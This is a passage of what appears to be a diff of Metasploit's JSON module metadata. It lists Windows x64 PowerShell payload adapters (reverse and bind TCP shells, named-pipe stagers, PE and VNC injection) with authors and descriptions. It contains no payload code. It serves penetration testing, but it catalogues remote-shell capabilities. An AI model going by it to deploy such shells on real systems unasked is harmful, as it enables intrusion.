"arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/x64/peinject/bind_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell/x64", - "adapted_refname": "windows/x64/peinject/bind_tcp_uuid", - "staged": true, - "stage_refname": "windows/x64/peinject", - "stager_refname": "windows/x64/bind_tcp_uuid" - }, - "payload_cmd/windows/powershell/x64/peinject/reverse_named_pipe": { - "name": "Powershell Exec, Windows x64 Reverse Named Pipe (SMB) Stager", - "fullname": "payload/cmd/windows/powershell/x64/peinject/reverse_named_pipe", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "ege ", - "OJ Reeves" - ], - "description": "Execute an x64 payload from a command via PowerShell.\n\nConnect back to the attacker via a named pipe pivot", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/x64/peinject/reverse_named_pipe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell/x64", - "adapted_refname": "windows/x64/peinject/reverse_named_pipe", - "staged": true, - "stage_refname": "windows/x64/peinject", - "stager_refname": "windows/x64/reverse_named_pipe" - }, - "payload_cmd/windows/powershell/x64/peinject/reverse_tcp": { - "name": "Powershell Exec, Windows x64 Reverse TCP Stager", - "fullname": "payload/cmd/windows/powershell/x64/peinject/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "ege ", - "sf " - ], - "description": "Execute an x64 payload from a command via PowerShell.\n\nConnect back to the attacker (Windows x64)", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/x64/peinject/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell/x64", - "adapted_refname": "windows/x64/peinject/reverse_tcp", - "staged": true, - "stage_refname": "windows/x64/peinject", - "stager_refname": "windows/x64/reverse_tcp" - }, - "payload_cmd/windows/powershell/x64/peinject/reverse_tcp_rc4": { - "name": "Powershell Exec, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/cmd/windows/powershell/x64/peinject/reverse_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "ege ", - "hdm ", - "skape ", - "sf ", - "mihi", - "max3raza", - "RageLtMan" - ], - "description": "Execute an x64 payload from a command via PowerShell.\n\nConnect back to the attacker", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/x64/peinject/reverse_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell/x64", - "adapted_refname": "windows/x64/peinject/reverse_tcp_rc4", - "staged": true, - "stage_refname": "windows/x64/peinject", - "stager_refname": "windows/x64/reverse_tcp_rc4" - }, - "payload_cmd/windows/powershell/x64/peinject/reverse_tcp_uuid": { - "name": "Powershell Exec, Reverse TCP Stager with UUID Support (Windows x64)", - "fullname": "payload/cmd/windows/powershell/x64/peinject/reverse_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "ege ", - "sf ", - "OJ Reeves" - ], - "description": "Execute an x64 payload from a command via PowerShell.\n\nConnect back to the attacker with UUID Support (Windows x64)", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/x64/peinject/reverse_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell/x64", - "adapted_refname": "windows/x64/peinject/reverse_tcp_uuid", - "staged": true, - "stage_refname": "windows/x64/peinject", - "stager_refname": "windows/x64/reverse_tcp_uuid" - }, - "payload_cmd/windows/powershell/x64/pingback_reverse_tcp": { - "name": "Powershell Exec, Windows x64 Pingback, Reverse TCP Inline", - "fullname": "payload/cmd/windows/powershell/x64/pingback_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "bwatters-r7" - ], - "description": "Execute an x64 payload from a command via PowerShell.\n\nConnect back to attacker and report UUID (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/x64/pingback_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell/x64", - "adapted_refname": "windows/x64/pingback_reverse_tcp", - "staged": false - }, - "payload_cmd/windows/powershell/x64/powershell_bind_tcp": { - "name": "Powershell Exec", - "fullname": "payload/cmd/windows/powershell/x64/powershell_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "Ben Turner", - "Dave Hardy", - "sf " - ], - "description": "Execute an x64 payload from a command via PowerShell", - "references": [ - "URL-https://blog.nettitude.com/uk/interactive-powershell-session-via-metasploit" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/x64/powershell_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell/x64", - "adapted_refname": "windows/x64/powershell_bind_tcp", - "staged": false - }, - "payload_cmd/windows/powershell/x64/powershell_reverse_tcp": { - "name": "Powershell Exec", - "fullname": "payload/cmd/windows/powershell/x64/powershell_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "Ben Turner", - "Dave Hardy", - "sf " - ], - "description": "Execute an x64 payload from a command via PowerShell", - "references": [ - "URL-https://blog.nettitude.com/uk/interactive-powershell-session-via-metasploit" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/x64/powershell_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell/x64", - "adapted_refname": "windows/x64/powershell_reverse_tcp", - "staged": false - }, - "payload_cmd/windows/powershell/x64/powershell_reverse_tcp_ssl": { - "name": "Powershell Exec", - "fullname": "payload/cmd/windows/powershell/x64/powershell_reverse_tcp_ssl", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "Ben Turner", - "Dave Hardy", - "sf " - ], - "description": "Execute an x64 payload from a command via PowerShell", - "references": [ - "URL-https://blog.nettitude.com/uk/interactive-powershell-session-via-metasploit" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/x64/powershell_reverse_tcp_ssl", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell/x64", - "adapted_refname": "windows/x64/powershell_reverse_tcp_ssl", - "staged": false - }, - "payload_cmd/windows/powershell/x64/shell/bind_ipv6_tcp": { - "name": "Powershell Exec, Windows x64 Command Shell, Windows x64 IPv6 Bind TCP Stager", - "fullname": "payload/cmd/windows/powershell/x64/shell/bind_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf " - ], - "description": "Execute an x64 payload from a command via PowerShell.\n\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for an IPv6 connection (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/x64/shell/bind_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell/x64", - "adapted_refname": "windows/x64/shell/bind_ipv6_tcp", - "staged": true, - "stage_refname": "windows/x64/shell", - "stager_refname": "windows/x64/bind_ipv6_tcp" - }, - "payload_cmd/windows/powershell/x64/shell/bind_ipv6_tcp_uuid": { - "name": "Powershell Exec, Windows x64 Command Shell, Windows x64 IPv6 Bind TCP Stager with UUID Support", - "fullname": "payload/cmd/windows/powershell/x64/shell/bind_ipv6_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf ", - "OJ Reeves" - ], - "description": "Execute an x64 payload from a command via PowerShell.\n\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for an IPv6 connection with UUID Support (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/x64/shell/bind_ipv6_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell/x64", - "adapted_refname": "windows/x64/shell/bind_ipv6_tcp_uuid", - "staged": true, - "stage_refname": "windows/x64/shell", - "stager_refname": "windows/x64/bind_ipv6_tcp_uuid" - }, - "payload_cmd/windows/powershell/x64/shell/bind_named_pipe": { - "name": "Powershell Exec, Windows x64 Command Shell, Windows x64 Bind Named Pipe Stager", - "fullname": "payload/cmd/windows/powershell/x64/shell/bind_named_pipe", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf ", - "UserExistsError" - ], - "description": "Execute an x64 payload from a command via PowerShell.\n\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for a pipe connection (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/x64/shell/bind_named_pipe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell/x64", - "adapted_refname": "windows/x64/shell/bind_named_pipe", - "staged": true, - "stage_refname": "windows/x64/shell", - "stager_refname": "windows/x64/bind_named_pipe" - }, - "payload_cmd/windows/powershell/x64/shell/bind_tcp": { - "name": "Powershell Exec, Windows x64 Command Shell, Windows x64 Bind TCP Stager", - "fullname": "payload/cmd/windows/powershell/x64/shell/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf " - ], - "description": "Execute an x64 payload from a command via PowerShell.\n\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for a connection (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/x64/shell/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell/x64", - "adapted_refname": "windows/x64/shell/bind_tcp", - "staged": true, - "stage_refname": "windows/x64/shell", - "stager_refname": "windows/x64/bind_tcp" - }, - "payload_cmd/windows/powershell/x64/shell/bind_tcp_rc4": { - "name": "Powershell Exec, Windows x64 Command Shell, Bind TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/cmd/windows/powershell/x64/shell/bind_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf ", - "hdm ", - "skape ", - "mihi", - "max3raza", - "RageLtMan" - ], - "description": "Execute an x64 payload from a command via PowerShell.\n\nSpawn a piped command shell (Windows x64) (staged).\n\nConnect back to the attacker", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/x64/shell/bind_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell/x64", - "adapted_refname": "windows/x64/shell/bind_tcp_rc4", - "staged": true, - "stage_refname": "windows/x64/shell", - "stager_refname": "windows/x64/bind_tcp_rc4" - }, - "payload_cmd/windows/powershell/x64/shell/bind_tcp_uuid": { - "name": "Powershell Exec, Windows x64 Command Shell, Bind TCP Stager with UUID Support (Windows x64)", - "fullname": "payload/cmd/windows/powershell/x64/shell/bind_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf ", - "OJ Reeves" - ], - "description": "Execute an x64 payload from a command via PowerShell.\n\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for a connection with UUID Support (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/x64/shell/bind_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell/x64", - "adapted_refname": "windows/x64/shell/bind_tcp_uuid", - "staged": true, - "stage_refname": "windows/x64/shell", - "stager_refname": "windows/x64/bind_tcp_uuid" - }, - "payload_cmd/windows/powershell/x64/shell/reverse_tcp": { - "name": "Powershell Exec, Windows x64 Command Shell, Windows x64 Reverse TCP Stager", - "fullname": "payload/cmd/windows/powershell/x64/shell/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf " - ], - "description": "Execute an x64 payload from a command via PowerShell.\n\nSpawn a piped command shell (Windows x64) (staged).\n\nConnect back to the attacker (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/x64/shell/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell/x64", - "adapted_refname": "windows/x64/shell/reverse_tcp", - "staged": true, - "stage_refname": "windows/x64/shell", - "stager_refname": "windows/x64/reverse_tcp" - }, - "payload_cmd/windows/powershell/x64/shell/reverse_tcp_rc4": { - "name": "Powershell Exec, Windows x64 Command Shell, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/cmd/windows/powershell/x64/shell/reverse_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf ", - "hdm ", - "skape ", - "mihi", - "max3raza", - "RageLtMan" - ], - "description": "Execute an x64 payload from a command via PowerShell.\n\nSpawn a piped command shell (Windows x64) (staged).\n\nConnect back to the attacker", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/x64/shell/reverse_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell/x64", - "adapted_refname": "windows/x64/shell/reverse_tcp_rc4", - "staged": true, - "stage_refname": "windows/x64/shell", - "stager_refname": "windows/x64/reverse_tcp_rc4" - }, - "payload_cmd/windows/powershell/x64/shell/reverse_tcp_uuid": { - "name": "Powershell Exec, Windows x64 Command Shell, Reverse TCP Stager with UUID Support (Windows x64)", - "fullname": "payload/cmd/windows/powershell/x64/shell/reverse_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf ", - "OJ Reeves" - ], - "description": "Execute an x64 payload from a command via PowerShell.\n\nSpawn a piped command shell (Windows x64) (staged).\n\nConnect back to the attacker with UUID Support (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/x64/shell/reverse_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell/x64", - "adapted_refname": "windows/x64/shell/reverse_tcp_uuid", - "staged": true, - "stage_refname": "windows/x64/shell", - "stager_refname": "windows/x64/reverse_tcp_uuid" - }, - "payload_cmd/windows/powershell/x64/shell_bind_tcp": { - "name": "Powershell Exec, Windows x64 Command Shell, Bind TCP Inline", - "fullname": "payload/cmd/windows/powershell/x64/shell_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf " - ], - "description": "Execute an x64 payload from a command via PowerShell.\n\nListen for a connection and spawn a command shell (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/x64/shell_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell/x64", - "adapted_refname": "windows/x64/shell_bind_tcp", - "staged": false - }, - "payload_cmd/windows/powershell/x64/shell_reverse_tcp": { - "name": "Powershell Exec, Windows x64 Command Shell, Reverse TCP Inline", - "fullname": "payload/cmd/windows/powershell/x64/shell_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf " - ], - "description": "Execute an x64 payload from a command via PowerShell.\n\nConnect back to attacker and spawn a command shell (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/x64/shell_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell/x64", - "adapted_refname": "windows/x64/shell_reverse_tcp", - "staged": false - }, - "payload_cmd/windows/powershell/x64/vncinject/bind_ipv6_tcp": { - "name": "Powershell Exec, Windows x64 IPv6 Bind TCP Stager", - "fullname": "payload/cmd/windows/powershell/x64/vncinject/bind_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf " - ], - "description": "Execute an x64 payload from a command via PowerShell.\n\nListen for an IPv6 connection (Windows x64)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/x64/vncinject/bind_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell/x64", - "adapted_refname": "windows/x64/vncinject/bind_ipv6_tcp", - "staged": true, - "stage_refname": "windows/x64/vncinject", - "stager_refname": "windows/x64/bind_ipv6_tcp" - }, - "payload_cmd/windows/powershell/x64/vncinject/bind_ipv6_tcp_uuid": { - "name": "Powershell Exec, Windows x64 IPv6 Bind TCP Stager with UUID Support", - "fullname": "payload/cmd/windows/powershell/x64/vncinject/bind_ipv6_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf ", - "OJ Reeves" - ], - "description": "Execute an x64 payload from a command via PowerShell.\n\nListen for an IPv6 connection with UUID Support (Windows x64)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/x64/vncinject/bind_ipv6_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell/x64", - "adapted_refname": "windows/x64/vncinject/bind_ipv6_tcp_uuid", - "staged": true, - "stage_refname": "windows/x64/vncinject", - "stager_refname": "windows/x64/bind_ipv6_tcp_uuid" - }, - "payload_cmd/windows/powershell/x64/vncinject/bind_named_pipe": { - "name": "Powershell Exec, Windows x64 Bind Named Pipe Stager", - "fullname": "payload/cmd/windows/powershell/x64/vncinject/bind_named_pipe", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf ", - "UserExistsError" - ], - "description": "Execute an x64 payload from a command via PowerShell.\n\nListen for a pipe connection (Windows x64)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/x64/vncinject/bind_named_pipe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell/x64", - "adapted_refname": "windows/x64/vncinject/bind_named_pipe", - "staged": true, - "stage_refname": "windows/x64/vncinject", - "stager_refname": "windows/x64/bind_named_pipe" - }, - "payload_cmd/windows/powershell/x64/vncinject/bind_tcp": { - "name": "Powershell Exec, Windows x64 Bind TCP Stager", - "fullname": "payload/cmd/windows/powershell/x64/vncinject/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf " - ], - "description": "Execute an x64 payload from a command via PowerShell.\n\nListen for a connection (Windows x64)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/x64/vncinject/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell/x64", - "adapted_refname": "windows/x64/vncinject/bind_tcp", - "staged": true, - "stage_refname": "windows/x64/vncinject", - "stager_refname": "windows/x64/bind_tcp" - }, - "payload_cmd/windows/powershell/x64/vncinject/bind_tcp_rc4": { - "name": "Powershell Exec, Bind TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/cmd/windows/powershell/x64/vncinject/bind_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf ", - "hdm ", - "skape ", - "mihi", - "max3raza", - "RageLtMan" - ], - "description": "Execute an x64 payload from a command via PowerShell.\n\nConnect back to the attacker", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/x64/vncinject/bind_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell/x64", - "adapted_refname": "windows/x64/vncinject/bind_tcp_rc4", - "staged": true, - "stage_refname": "windows/x64/vncinject", - "stager_refname": "windows/x64/bind_tcp_rc4" - }, - "payload_cmd/windows/powershell/x64/vncinject/bind_tcp_uuid": { - "name": "Powershell Exec, Bind TCP Stager with UUID Support (Windows x64)", - "fullname": "payload/cmd/windows/powershell/x64/vncinject/bind_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf ", - "OJ Reeves" - ], - "description": "Execute an x64 payload from a command via PowerShell.\n\nListen for a connection with UUID Support (Windows x64)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/x64/vncinject/bind_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell/x64", 